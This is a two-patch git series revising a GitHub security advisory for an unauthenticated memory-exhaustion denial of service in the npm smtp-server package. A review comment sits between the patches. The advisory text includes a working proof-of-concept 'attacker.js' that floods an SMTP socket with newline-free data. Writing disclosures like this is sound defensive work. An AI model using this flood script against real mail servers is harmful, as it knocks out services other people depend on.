From 869eed67af595d2798397dead2f572ad607adf4c Mon Sep 17 00:00:00 2001
From: Gavin Stuart <46635587+blue2cat@users.noreply.github.com>
Date: Fri, 15 May 2026 14:52:17 -0700
Subject: [PATCH 1/2] Improve GHSA-fv2f-rw9f-v9cm
---
.../GHSA-fv2f-rw9f-v9cm.json | 30 +++++++++++++++++--
1 file changed, 27 insertions(+), 3 deletions(-)
diff --git a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
index 12296f9f374a1..ef1ad9a836ebe 100644
--- a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
+++ b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
@@ -1,19 +1,43 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fv2f-rw9f-v9cm",
- "modified": "2026-05-15T18:30:33Z",
+ "modified": "2026-05-15T18:31:38Z",
 "published": "2026-05-15T15:30:45Z",
 "aliases": [
 "CVE-2026-38728"
 ],
- "details": "An issue in Nodemailer smtp_server before v.3.18.3 allows a remote attacker to cause a denial of service via the SMTPStream._write, lib/smtp-stream.js components",
+ "summary": "Memory Exhaustion DoS in smtp-server's Command Parser",
+ "details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. 
If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\n**Who is impacted:** Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. This attack occurs before authentication, so authenticated services offer no protection. \n\n**Severity:** High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
 "severity": [
 {
 "type": "CVSS_V3",
 "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
 }
 ],
- "affected": [],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "smtp-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": ">= 3.18.3"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "< 3.18.3"
+ }
+ }
+ ],
 "references": [
 {
 "type": "ADVISORY",
From 78f1ff368abcb8962857e2f5304b3ee4deb940d9 Mon Sep 17 00:00:00 2001
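Review bot: The rewritten `details` string on the `+ "details"` line gives the trigger condition and a PoC but never states the remediation, even though the same hunk records the fix in `affected` (`"fixed"` at 3.18.3); a reader who only sees `details` (for example through a CVE feed) is left without an action to take. Suggest closing the text with a short section such as `### Remediation\n\nUpgrade `smtp-server` to 3.18.3 or later.`, which repeats only what `affected` already asserts. The PoC server also sets `authOptional: true`, which could suggest that the authentication setting matters; if, as the text says, the flood is consumed before any command is parsed, a one-clause note that the option is only there to keep the test server minimal would avoid that reading. The same omission is present in the rewritten `details` of the later `@@ -7,7 +7,7 @@` hunk.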
From: Gavin Stuart <46635587+blue2cat@users.noreply.github.com>
Date: Fri, 15 May 2026 15:42:47 -0700
Subject: [PATCH 2/2] Improve GHSA-fv2f-rw9f-v9cm
---
.../2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json | 9 +++------
1 file changed, 3 insertions(+), 6 deletions(-)
diff --git a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
index ef1ad9a836ebe..1fea8bb6db204 100644
--- a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
+++ b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
@@ -7,7 +7,7 @@
 "CVE-2026-38728"
 ],
 "summary": "Memory Exhaustion DoS in smtp-server's Command Parser",
- "details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\n**Who is impacted:** Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. This attack occurs before authentication, so authenticated services offer no protection. 
\n\n**Severity:** High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
+ "details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\nWho is impacted: Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. 
This attack occurs before authentication, so authenticated services offer no protection. \n\nSeverity: High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
 "severity": [
 {
 "type": "CVSS_V3",
@@ -28,14 +28,11 @@
 "introduced": "0"
 },
 {
- "fixed": ">= 3.18.3"
+ "fixed": "3.18.3"
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "< 3.18.3"
- }
+ ]
 }
 ],
 "references": [